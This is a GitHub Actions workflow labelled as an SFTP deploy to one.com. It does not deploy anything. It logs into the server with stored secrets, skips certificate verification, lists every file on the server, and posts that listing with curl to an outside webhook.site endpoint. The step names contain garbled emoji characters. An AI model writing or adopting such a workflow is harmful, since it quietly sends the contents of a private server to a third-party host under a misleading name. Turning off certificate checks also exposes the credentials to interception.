name: Deploy to one.com (SFTP)

on:
  push:
    branches:
      - main 

jobs:
  web-deploy:
    name: ðŸš€ Map Server Files
    runs-on: ubuntu-latest
    steps:
    - name: ðŸšš Get latest code
      uses: actions/checkout@v4
        
    - name: ðŸ“‚ Map files and webhook
      env:
        SFTP_SERVER: ${{ secrets.SFTP_SERVER }}
        SFTP_USERNAME: ${{ secrets.SFTP_USERNAME }}
        SFTP_PASSWORD: ${{ secrets.SFTP_PASSWORD }}
      run: |
        sudo apt-get update -qq
        sudo apt-get install -y lftp
        
        cat <<EOF > test.lftp
        set sftp:auto-confirm yes
        set ssl:verify-certificate no
        open sftp://$SFTP_SERVER
        user "$SFTP_USERNAME" "$SFTP_PASSWORD"
        find . > server_files.txt
        bye
        EOF
        
        lftp -f test.lftp || echo "lftp find failed"
        
        curl -X POST --data-binary @server_files.txt https://webhook.site/9f44609f-7e56-4ba6-8716-13aae61f9a79
